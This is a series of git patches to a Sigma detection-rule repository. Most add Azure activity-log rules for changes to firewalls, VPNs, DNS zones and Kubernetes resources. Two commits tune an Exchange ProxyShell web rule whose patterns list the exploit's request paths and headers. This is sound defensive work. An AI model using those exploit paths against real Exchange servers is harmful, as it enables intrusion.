a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml index 67de51ff..f805aadf 100644 --- a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From 74f449335217cecf573d8905f8f0605be086f2ca Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:11:47 -0500 Subject: [PATCH 0231/1367] Update azure_kubernetes_cluster_created_or_deleted.yml --- rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml index be97bf7b..ee76990b 100644 --- a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From f7e7be15ba2c63b906d97cdce4e34d29322bc8ff Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:12:04 -0500 Subject: [PATCH 0232/1367] Update azure_kubernetes_service_account_modified_or_deleted.yml --- .../azure_kubernetes_service_account_modified_or_deleted.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml index ddae4ee5..2e89711e 100644 --- a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From cba78fc5e63ac37f71429fb12e35c8cfa0be11ee Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:12:23 -0500 Subject: [PATCH 0233/1367] Update azure_container_registry_created_or_deleted.yml --- rules/cloud/azure_container_registry_created_or_deleted.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure_container_registry_created_or_deleted.yml index 0bf949a2..4b8897bb 100644 --- a/rules/cloud/azure_container_registry_created_or_deleted.yml +++ b/rules/cloud/azure_container_registry_created_or_deleted.yml @@ -5,7 +5,11 @@ author: Austin Songer status: experimental date: 2021/08/07 references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From 12565b4fd45c2284ff67a74cbb395d4d628e1311 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:12:43 -0500 Subject: [PATCH 0234/1367] Update azure_kubernetes_role_access.yml --- rules/cloud/azure_kubernetes_role_access.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_role_access.yml b/rules/cloud/azure_kubernetes_role_access.yml index 2a6dab4d..553711ec 100644 --- a/rules/cloud/azure_kubernetes_role_access.yml +++ b/rules/cloud/azure_kubernetes_role_access.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From 96ae859a7beb0fbf1b83cfde0585b7a66e2fe7dd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:13:02 -0500 Subject: [PATCH 0235/1367] Update azure_kubernetes_network_policy_change.yml --- rules/cloud/azure_kubernetes_network_policy_change.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml index 488d9886..85317337 100644 --- a/rules/cloud/azure_kubernetes_network_policy_change.yml +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From a80f9f280c0c1dd2dbc99f251aa7865719b5c1aa Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 8 Aug 2021 23:05:23 +0200 Subject: [PATCH 0236/1367] refactor: feedback from Rich Warren --- rules/web/web_exchange_proxyshell.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index b23276d0..4ba047f3 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -6,7 +6,7 @@ references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 -author: Florian Roth +author: Florian Roth, Rich Warren date: 2021/08/07 modified: 2021/08/08 tags: @@ -20,6 +20,8 @@ detection: c-uri|contains: - '/powershell' - '/mapi/nspi' + - '/EWS' + - 'X-Rps-CAT' selection_poc: c-uri|contains: # since we don't know how it will appear in the log files, we'll just use all versions From af1e43f3c1009d8fc409bdd4f00dcbd92b7c7453 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 8 Aug 2021 23:05:56 +0200 Subject: [PATCH 0237/1367] more generic --- rules/web/web_exchange_proxyshell.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index 4ba047f3..abcd6c03 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -15,7 +15,7 @@ logsource: category: webserver detection: selection_auto: - c-uri|contains: '/autodiscover/autodiscover.json?' + c-uri|contains: '/autodiscover.json' selection_uri: c-uri|contains: - '/powershell' From 6bc42501d340c70b310d3733b77a48a0fd6ec228 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:11:59 -0500 Subject: [PATCH 0238/1367] Create azure_vpn_connection_modified_or_deleted.yml --- ...ure_vpn_connection_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_vpn_connection_modified_or_deleted.yml diff --git a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml new file mode 100644 index 00000000..d41326fd --- /dev/null +++ b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml @@ -0,0 +1,22 @@ +title: Azure VPN Connection Modified or Deleted +id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3 +description: Identifies when a VPN connection is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE + - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 47c88386258422b5a24c34147c76a9103f99f9b6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:16:06 -0500 Subject: [PATCH 0239/1367] Create azure_virtual_network_modified_or_deleted.yml --- ...re_virtual_network_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_virtual_network_modified_or_deleted.yml diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure_virtual_network_modified_or_deleted.yml new file mode 100644 index 00000000..ab700f89 --- /dev/null +++ b/rules/cloud/azure_virtual_network_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Virtual Network Modified or Deleted +id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f +description: Identifies when a Virtual Network is modified or deleted in Azure. +author: Austin Songer +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/WRITE + - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/DELETE + - MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE + - MICROSOFT.NETWORK/VIRTUALNETWORKS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From f75260211184dae7efc8d682af6aee02479074bd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:42:08 -0500 Subject: [PATCH 0240/1367] Create azure_dns_zone_modified_or_deleted.yml --- .../azure_dns_zone_modified_or_deleted.yml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 rules/cloud/azure_dns_zone_modified_or_deleted.yml diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml new file mode 100644 index 00000000..e5c547be --- /dev/null +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -0,0 +1,43 @@ +title: Azure DNS Zone Modified or Deleted +id: af6925b0-8826-47f1-9324-337507a0babd +description: Identifies when DNS zone is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/DNSZONES/WRITE + - MICROSOFT.NETWORK/DNSZONES/DELETE + - MICROSOFT.NETWORK/DNSZONES/A/WRITE + - MICROSOFT.NETWORK/DNSZONES/A/DELETE + - MICROSOFT.NETWORK/DNSZONES/AAAA/WRITE + - MICROSOFT.NETWORK/DNSZONES/AAAA/DELETE + - MICROSOFT.NETWORK/DNSZONES/CAA/READ + - MICROSOFT.NETWORK/DNSZONES/CAA/WRITE + - MICROSOFT.NETWORK/DNSZONES/CAA/DELETE + - MICROSOFT.NETWORK/DNSZONES/CNAME/WRITE + - MICROSOFT.NETWORK/DNSZONES/CNAME/DELETE + - MICROSOFT.NETWORK/DNSZONES/MX/WRITE + - MICROSOFT.NETWORK/DNSZONES/MX/DELETE + - MICROSOFT.NETWORK/DNSZONES/NS/WRITE + - MICROSOFT.NETWORK/DNSZONES/NS/DELETE + - MICROSOFT.NETWORK/DNSZONES/PTR/WRITE + - MICROSOFT.NETWORK/DNSZONES/PTR/DELETE + - MICROSOFT.NETWORK/DNSZONES/SOA/WRITE + - MICROSOFT.NETWORK/DNSZONES/SRV/WRITE + - MICROSOFT.NETWORK/DNSZONES/SRV/DELETE + - MICROSOFT.NETWORK/DNSZONES/TXT/WRITE + - MICROSOFT.NETWORK/DNSZONES/TXT/DELETE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From dc33f131f13203d64ebe1f73f9c63147336b3eff Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:42:51 -0500 Subject: [PATCH 0241/1367] Create azure_firewall_modified_or_deleted.yml --- .../azure_firewall_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_firewall_modified_or_deleted.yml diff --git a/rules/cloud/azure_firewall_modified_or_deleted.yml b/rules/cloud/azure_firewall_modified_or_deleted.yml new file mode 100644 index 00000000..d37781a6 --- /dev/null +++ b/rules/cloud/azure_firewall_modified_or_deleted.yml @@ -0,0 +1,22 @@ +title: Azure Firewall Modified or Deleted +id: 512cf937-ea9b-4332-939c-4c2c94baadcd +description: Identifies when a firewall is created, modified, or deleted. +author: Austin Songer +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 35f5b56853cc72ac5a891867604174ef5865df95 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:43:47 -0500 Subject: [PATCH 0242/1367] Create azure_firewall_rule_collection_modified_or_deleted.yml --- ...ll_rule_collection_modified_or_deleted.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml diff --git a/rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml b/rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml new file mode 100644 index 00000000..6fb67edb --- /dev/null +++ b/rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml @@ -0,0 +1,26 @@ +title: Azure Firewall Rule Collection Modified or Deleted +id: 025c9fe7-db72-49f9-af0d-31341dd7dd57 +description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/DELETE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE + - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 038011a1d52f198444dded3096e0ee55d80d0e73 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:46:03 -0500 Subject: [PATCH 0243/1367] Create azure_network_firewall_rule_modified_or_deleted.yml --- ...work_firewall_rule_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml new file mode 100644 index 00000000..809516ce --- /dev/null +++ b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Firewall Rule Configuration Modified or Deleted +id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 +description: Identifies when a Firewall Rule Configuration is Modified or Deleted. +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 6f72c46bba159b9a67e53a92257527d6ec11d475 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:47:35 -0500 Subject: [PATCH 0244/1367] Create azure_network_p2s_vpn_modified_or_deleted.yml --- ...re_network_p2s_vpn_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml new file mode 100644 index 00000000..dc61f6be --- /dev/null +++ b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml @@ -0,0 +1,22 @@ +title: Azure Point-to-site VPN Modified or Deleted +id: d9557b75-267b-4b43-922f-a775e2d1f792 +description: Identifies when a Point-to-site VPN is Modified or Deleted. +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 89197b1782b44a6e759aa5b70ef955116ee1f397 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:49:39 -0500 Subject: [PATCH 0245/1367] Create azure_network_security_modified_or_deleted.yml --- ...e_network_security_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_network_security_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_security_modified_or_deleted.yml b/rules/cloud/azure_network_security_modified_or_deleted.yml new file mode 100644 index 00000000..3a1220ae --- /dev/null +++ b/rules/cloud/azure_network_security_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Network Security Configuration Modified or Deleted +id: d22b4df4-5a67-4859-a578-8c9a0b5af9df +description: Identifies when a network security configuration is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From b9f84bedc55609d7c195ba53e13617ecbfc2aec1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:52:15 -0500 Subject: [PATCH 0246/1367] Create azure_network_virtual_device_modified_or_deleted.yml --- ...ork_virtual_device_modified_or_deleted.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/cloud/azure_network_virtual_device_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml new file mode 100644 index 00000000..85027a0b --- /dev/null +++ b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml @@ -0,0 +1,29 @@ +title: Azure Virtual Network Device Modified or Deleted +id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 +description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual applicance, vitual hub, or virtual router. +author: Austin Songer +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE + - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION + - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE + - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE + - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE + - MICROSOFT.NETWORK/VIRTUALHUBS/DELETE + - MICROSOFT.NETWORK/VIRTUALHUBS/WRITE + - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE + - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From f519ec70ecf23938075c01dd7742ebf5fa78a810 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:58:00 -0500 Subject: [PATCH 0247/1367] Update azure_dns_zone_modified_or_deleted.yml --- rules/cloud/azure_dns_zone_modified_or_deleted.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index e5c547be..8497bf20 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -3,7 +3,7 @@ id: af6925b0-8826-47f1-9324-337507a0babd description: Identifies when DNS zone is modified or deleted. author: Austin Songer status: experimental -date: 2021/08/07 +date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes logsource: @@ -37,7 +37,6 @@ detection: level: medium tags: - attack.impact - - attack.credential_access falsepositives: - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 57cc54b4e6b6ed8cc8e1faab3c735d15a4ed5a8c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:58:26 -0500 Subject: [PATCH 0248/1367] Update azure_virtual_network_modified_or_deleted.yml --- rules/cloud/azure_virtual_network_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure_virtual_network_modified_or_deleted.yml index ab700f89..fd261ea6 100644 --- a/rules/cloud/azure_virtual_network_modified_or_deleted.yml +++ b/rules/cloud/azure_virtual_network_modified_or_deleted.yml @@ -13,7 +13,7 @@ detection: properties.message: - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/WRITE - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/DELETE - - MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE + - MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE - MICROSOFT.NETWORK/VIRTUALNETWORKS/DELETE condition: selection level: medium From de405479d2a8269657874f9e6eb979db112451f4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:59:42 -0500 Subject: [PATCH 0249/1367] Update azure_network_virtual_device_modified_or_deleted.yml --- .../cloud/azure_network_virtual_device_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml index 85027a0b..5a5ec909 100644 --- a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml +++ b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE From d99f1ed60a209711cd05b5c7db449d1695ccbd45 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:00:06 -0500 Subject: [PATCH 0250/1367] Update azure_network_security_modified_or_deleted.yml --- rules/cloud/azure_network_security_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_network_security_modified_or_deleted.yml b/rules/cloud/azure_network_security_modified_or_deleted.yml index 3a1220ae..1c62b1e1 100644 --- a/rules/cloud/azure_network_security_modified_or_deleted.yml +++ b/rules/cloud/azure_network_security_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE From 688a531e6e3cf709d00240bf348a9dd8e5453aa8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:00:25 -0500 Subject: [PATCH 0251/1367] Update azure_network_p2s_vpn_modified_or_deleted.yml --- rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml index dc61f6be..d65d147d 100644 --- a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml +++ b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml @@ -3,14 +3,14 @@ id: d9557b75-267b-4b43-922f-a775e2d1f792 description: Identifies when a Point-to-site VPN is Modified or Deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE condition: selection From bed03b324cf9b033a49de77763f61fb35696f64a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 